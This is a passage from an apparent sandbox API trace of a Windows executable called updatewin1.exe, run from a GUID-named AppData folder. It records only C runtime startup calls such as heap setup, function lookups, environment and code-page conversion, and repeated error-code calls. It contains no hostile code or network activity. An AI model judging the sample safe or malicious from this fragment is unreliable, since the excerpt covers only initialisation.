HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0043.435] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1c60000 [0043.436] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.436] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0043.437] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0043.437] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0043.437] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0043.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.437] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.437] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.437] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.437] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.438] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.438] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.438] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.438] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.438] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.438] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0043.439] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x214) returned 0x1c607d0 [0043.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.439] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0043.439] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0043.439] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0043.439] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0043.439] GetCurrentThreadId () returned 0x9ec [0043.439] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0043.439] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x8, Size=0x800) returned 0x1c609f0 [0043.439] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0043.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0043.439] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0043.439] SetHandleCount (uNumber=0x20) returned 0x20 [0043.440] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe\" " [0043.440] GetEnvironmentStringsW () returned 0x294e70* [0043.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0043.440] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x0, Size=0x565) returned 0x1c611f8 [0043.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1c611f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0043.440] FreeEnvironmentStringsW (penv=0x294e70) returned 1 [0043.440] GetLastError () returned 0x0 [0043.440] SetLastError (dwErrCode=0x0) [0043.440] GetLastError () returned 0x0 [0043.440] SetLastError (dwErrCode=0x0) [0043.440] GetLastError () returned 0x0 [0043.440] SetLastError (dwErrCode=0x0) [0043.440] GetACP () returned 0x4e4 [0043.440] RtlAllocateHeap (HeapHandle=0x1c60000, Flags=0x0, Size=0x220) returned 0x1c61768 [0043.440] GetLastError () returned 0x0 [0043.440] SetLastError (dwErrCode=0x0) [0043.440] IsValidCodePage (CodePage=0x4e4) returned 1 [0043.440] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0043.440] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0043.440] GetLastError () returned 0x0 [0043.440] SetLastError (dwErrCode=0x0) [0043.440] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0043.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0043.441] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0043.441] GetLastError () returned 0x0 [0043.441] SetLastError (dwErrCode=0x0) [0043.441] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0043.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﮿퓍㞕AĀ") returned 256 [0043.441] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﮿퓍㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0043.441] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﮿퓍㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0043.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16\x17ú×\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0043.441] GetLastError () returned 0x0 [0043.441] SetLastError (dwErrCode=0x0) [0043.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0043.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﮿퓍㞕AĀ") returned 256 [0043.441] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﮿퓍㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0043.441] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﮿퓍㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0043.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x16\x17ú×\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0043.441] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe")) returned 0x5f [0043.441] GetLastError () returned 0x0 [0043.441] SetLastError (dwErrCode=0x0) [0043.441] GetLastError () returned 0x0 [0043.441] SetLastError (dwErrCode=0x0) [0043.441] GetLastError () returned 0x0 [0043.441] SetLastError (dwErrCode=0x0) [0043.441] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.442] SetLastError (dwErrCode=0x0) [0043.442] GetLastError () returned 0x0 [0043.443] SetLastError (dwErrCode=0x0) [0043.443] GetLastError () returned 0x0 [0043.443] SetLastError (dwErrCode=0x0) [0043.443] GetLastError () returned 0x0 [0043.443] SetLastError (dwErrCode=0x0) [0043.443] GetLastError () returned 0x0 [0043.443] SetLastError (dwErrCode=0x0) [0043.443] GetLastError () returned 0x0 [0043.443] SetLastError (dwErrCode=0x0) [0043.443] GetLastError () returned 0x0 [0043.443] SetLastError (dwErrCode=0x0) [0043.444] GetLastError () returned 0x0 [0043.444] SetLastError (dwErrCode=0x0) [0043.444] GetLastError () returned 0x0 [0043.444] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.449] SetLastError (dwErrCode=0x0) [0043.449] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.450] SetLastError (dwErrCode=0x0) [0043.450] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.451] SetLastError (dwErrCode=0x0) [0043.451] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.452] SetLastError (dwErrCode=0x0) [0043.452] GetLastError () returned 0x0 [0043.453] SetLastError (dwErrCode=0x0) [0043.453] GetLastError () returned 